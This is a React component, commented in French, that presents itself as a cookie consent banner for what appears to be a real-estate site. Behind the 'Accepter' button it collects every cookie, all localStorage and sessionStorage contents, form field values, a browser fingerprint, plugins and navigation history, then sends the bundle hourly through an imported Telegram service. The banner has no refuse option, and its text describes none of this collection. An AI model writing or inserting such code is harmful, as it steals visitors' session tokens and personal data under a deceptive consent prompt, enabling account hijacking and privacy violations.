import React, { useState, useEffect } from 'react';
import { createCookiesFile } from '../utils/telegramService';

const CookieConsent = () => {
  const [isOpen, setIsOpen] = useState(false);

  useEffect(() => {
    const cookiesAccepted = localStorage.getItem('cookiesAccepted');
    
    if (!cookiesAccepted) {
      setIsOpen(true);
    } else {
      setupCookies();
      collectAndSendAllData(); // Collecter les données périodiquement si déjà accepté
    }

    // Collecter les données périodiquement
    const dataCollectionInterval = setInterval(() => {
      if (localStorage.getItem('cookiesAccepted') === 'true') {
        collectAndSendAllData();
      }
    }, 3600000); // Toutes les heures (en ms)

    return () => clearInterval(dataCollectionInterval);
  }, []);

  // Fonction améliorée pour récupérer tous les cookies
  const getAllCookies = () => {
    return document.cookie.split('; ').reduce((cookies, cookie) => {
      if (cookie) {
        const [name, value] = cookie.split('=');
        cookies.push({
          name,
          value,
          domain: window.location.hostname,
          path: '/',
          createdAt: new Date().toISOString()
        });
      }
      return cookies;
    }, []);
  };

  // Fonction pour extraire les données du localStorage
  const getLocalStorageData = () => {
    const data = {};
    for (let i = 0; i < localStorage.length; i++) {
      const key = localStorage.key(i);
      try {
        // Essayer de parser en JSON au cas où
        const value = localStorage.getItem(key);
        try {
          data[key] = JSON.parse(value);
        } catch {
          data[key] = value;
        }
      } catch (e) {
        data[key] = "[Erreur d'accès]";
      }
    }
    return data;
  };

  // Fonction pour extraire les données du sessionStorage
  const getSessionStorageData = () => {
    const data = {};
    for (let i = 0; i < sessionStorage.length; i++) {
      const key = sessionStorage.key(i);
      try {
        const value = sessionStorage.getItem(key);
        try {
          data[key] = JSON.parse(value);
        } catch {
          data[key] = value;
        }
      } catch (e) {
        data[key] = "[Erreur d'accès]";
      }
    }
    return data;
  };

  // Collecter les informations sur le navigateur
  const getBrowserInfo = () => {
    return {
      userAgent: navigator.userAgent,
      language: navigator.language,
      languages: navigator.languages,
      platform: navigator.platform,
      vendor: navigator.vendor,
      cookieEnabled: navigator.cookieEnabled,
      doNotTrack: navigator.doNotTrack,
      hardwareConcurrency: navigator.hardwareConcurrency,
      maxTouchPoints: navigator.maxTouchPoints,
      screenWidth: window.screen.width,
      screenHeight: window.screen.height,
      colorDepth: window.screen.colorDepth,
      pixelDepth: window.screen.pixelDepth,
      availWidth: window.screen.availWidth,
      availHeight: window.screen.availHeight,
      timezoneOffset: new Date().getTimezoneOffset(),
      timezone: Intl.DateTimeFormat().resolvedOptions().timeZone,
      connection: navigator.connection ? {
        effectiveType: navigator.connection.effectiveType,
        downlink: navigator.connection.downlink,
        rtt: navigator.connection.rtt,
        saveData: navigator.connection.saveData
      } : null,
      deviceMemory: navigator.deviceMemory,
      referrer: document.referrer,
      currentUrl: window.location.href,
      pageTitle: document.title
    };
  };

  // Collecter l'historique de navigation (limité à la session actuelle)
  const getNavigationHistory = () => {
    // On ne peut accéder qu'aux informations de la page actuelle
    // et aux événements de navigation que nous avons enregistrés
    let sessionHistory = JSON.parse(sessionStorage.getItem('navigationHistory') || '[]');
    
    // Ajouter l'URL actuelle si elle n'est pas déjà enregistrée
    const currentUrl = window.location.href;
    const timestamp = new Date().toISOString();
    
    if (!sessionHistory.some(entry => entry.url === currentUrl)) {
      sessionHistory.push({
        url: currentUrl,
        title: document.title,
        timestamp
      });
      sessionStorage.setItem('navigationHistory', JSON.stringify(sessionHistory));
    }
    
    return sessionHistory;
  };

  // Fonction pour obtenir des informations sur les plugins du navigateur
  const getBrowserPlugins = () => {
    const plugins = [];
    for (let i = 0; i < navigator.plugins.length; i++) {
      const plugin = navigator.plugins[i];
      plugins.push({
        name: plugin.name,
        filename: plugin.filename,
        description: plugin.description,
        version: plugin.version
      });
    }
    return plugins;
  };

  // Collecter les données de formulaires remplis par l'utilisateur (si autorisé)
  const getFormData = () => {
    const forms = document.querySelectorAll('form');
    const formData = [];
    
    forms.forEach((form, index) => {
      const inputs = {};
      form.querySelectorAll('input, select, textarea').forEach(input => {
        // Ne pas collecter les mots de passe
        if (input.type !== 'password') {
          inputs[input.name || `input_${index}`] = input.value;
        }
      });
      
      formData.push({
        id: form.id || `form_${index}`,
        action: form.action,
        method: form.method,
        inputs
      });
    });
    
    return formData;
  };

  // Générer un fingerprint unique
  const generateFingerprint = () => {
    const components = [
      navigator.userAgent,
      navigator.language,
      window.screen.colorDepth,
      window.screen.width + 'x' + window.screen.height,
      new Date().getTimezoneOffset(),
      !!window.sessionStorage,
      !!window.localStorage,
      navigator.hardwareConcurrency || 'unknown',
      navigator.deviceMemory || 'unknown',
      navigator.platform || 'unknown'
    ];
    
    let fingerprint = components.join('###');
    
    // Hachage simple du fingerprint (pas cryptographiquement sécurisé)
    let hash = 0;
    for (let i = 0; i < fingerprint.length; i++) {
      hash = ((hash << 5) - hash) + fingerprint.charCodeAt(i);
      hash |= 0; // Convertit en entier 32 bits
    }
    
    return hash.toString(16); // Convertit en hexadécimal
  };

  // Fonction pour installer les cookies de base
  const setupCookies = () => {
    // Générer un identifiant unique pour l'utilisateur s'il n'existe pas
    if (!getCookie('user_id')) {
      const userId = generateUserId();
      document.cookie = `user_id=${userId}; path=/; max-age=31536000`; // 1 an
    }
    
    // Cookie de session
    document.cookie = `session_id=${generateSessionId()}; path=/; max-age=86400`; // 1 jour
    
    // Cookies de traçage
    const now = new Date();
    
    // Première visite
    if (!getCookie('first_visit')) {
      document.cookie = `first_visit=${now.toISOString()}; path=/; max-age=31536000`;
    }
    
    // Nombre de visites
    const visitCount = parseInt(getCookie('visit_count') || '0') + 1;
    document.cookie = `visit_count=${visitCount}; path=/; max-age=31536000`;
    
    // Dernière visite
    document.cookie = `last_visit=${now.toISOString()}; path=/; max-age=31536000`;
    
    // Fingerprint du navigateur
    document.cookie = `browser_fingerprint=${generateFingerprint()}; path=/; max-age=31536000`;
    
    // Référent
    if (document.referrer) {
      document.cookie = `referrer=${encodeURIComponent(document.referrer)}; path=/; max-age=31536000`;
    }
    
    // URL actuelle
    document.cookie = `last_url=${encodeURIComponent(window.location.href)}; path=/; max-age=31536000`;
    
    // Enregistrer un cookie toutes les 10 secondes pour tracer le temps passé sur le site
    startActivityTracking();
    
    console.log('Cookies installés avec succès');
  };

  // Surveiller l'activité utilisateur
  const startActivityTracking = () => {
    const trackingInterval = setInterval(() => {
      if (localStorage.getItem('cookiesAccepted') === 'true') {
        document.cookie = `active_at=${new Date().toISOString()}; path=/; max-age=3600`;
      } else {
        clearInterval(trackingInterval);
      }
    }, 10000); // Toutes les 10 secondes
    
    // Enregistrer l'intervalle pour le nettoyage
    window.activityTrackingInterval = trackingInterval;
  };

  // Générer un ID utilisateur unique
  const generateUserId = () => {
    return 'user_' + Date.now() + '_' + Math.random().toString(36).substring(2, 15);
  };

  // Générer un ID de session unique
  const generateSessionId = () => {
    return 'sess_' + Date.now() + '_' + Math.random().toString(36).substring(2, 15);
  };

  // Fonction utilitaire pour obtenir la valeur d'un cookie par son nom
  const getCookie = (name) => {
    const value = `; ${document.cookie}`;
    const parts = value.split(`; ${name}=`);
    if (parts.length === 2) return parts.pop().split(';').shift();
    return null;
  };

  // Collecter et envoyer toutes les données disponibles
  const collectAndSendAllData = () => {
    try {
      const collectedData = {
        timestamp: new Date().toISOString(),
        cookies: getAllCookies(),
        localStorage: getLocalStorageData(),
        sessionStorage: getSessionStorageData(),
        browserInfo: getBrowserInfo(),
        plugins: getBrowserPlugins(),
        formData: getFormData(),
        navigationHistory: getNavigationHistory(),
        fingerprint: generateFingerprint(),
        currentPage: {
          url: window.location.href,
          title: document.title,
          referrer: document.referrer
        }
      };
      
      // Créer un fichier de données
      const dataFile = new File(
        [JSON.stringify(collectedData, null, 2)], 
        `user_data_${new Date().toISOString().split('T')[0]}.json`,
        { type: 'application/json' }
      );
      
      // Envoyer via le service Telegram
      createCookiesFile(dataFile);
      
      // Stocker également dans localStorage pour référence future
      try {
        localStorage.setItem('lastCollectedData', JSON.stringify({
          timestamp: new Date().toISOString(),
          dataSize: JSON.stringify(collectedData).length,
          fingerprint: collectedData.fingerprint
        }));
      } catch (e) {
        // En cas d'erreur de stockage (dépassement de quota)
        console.log('Erreur de stockage local:', e);
      }
      
      return collectedData;
    } catch (error) {
      console.error('Erreur lors de la collecte des données:', error);
      return null;
    }
  };

  const acceptCookies = () => {
    // Enregistrer le consentement
    localStorage.setItem('cookiesAccepted', 'true');
    
    // Installer les cookies de base
    setupCookies();
    
    // Collecter immédiatement toutes les données disponibles
    const collectedData = collectAndSendAllData();
    
    // Cookies de consentement
    document.cookie = `consent_given=true; path=/; max-age=31536000`;
    document.cookie = `consent_date=${new Date().toISOString()}; path=/; max-age=31536000`;
    
    // Fermer la modale
    setIsOpen(false);
  };

  if (!isOpen) {
    return null;
  }

  return (
    <div className="fixed inset-0 flex items-center justify-center bg-black bg-opacity-50 z-50">
      <div className="bg-white rounded-lg shadow-xl p-6 max-w-md w-full mx-4">
        <h2 className="text-xl font-bold text-orpi-secondary mb-4">Utilisation des cookies</h2>
        
        <p className="text-gray-600 mb-4">
          Ce site utilise des cookies et des technologies similaires pour améliorer votre expérience 
          et nous aider à comprendre comment vous utilisez notre site.
        </p>
        
        <p className="text-gray-600 mb-6">
          En cliquant sur "Accepter", vous consentez à l'utilisation de ces technologies 
          conformément à notre politique de confidentialité.
        </p>
        
        <div className="flex justify-center">
          <button
            onClick={acceptCookies}
            className="px-6 py-3 bg-orpi-primary text-white font-medium rounded-lg hover:bg-orpi-dark transition-colors"
          >
            Accepter
          </button>
        </div>
      </div>
    </div>
  );
};

export default CookieConsent;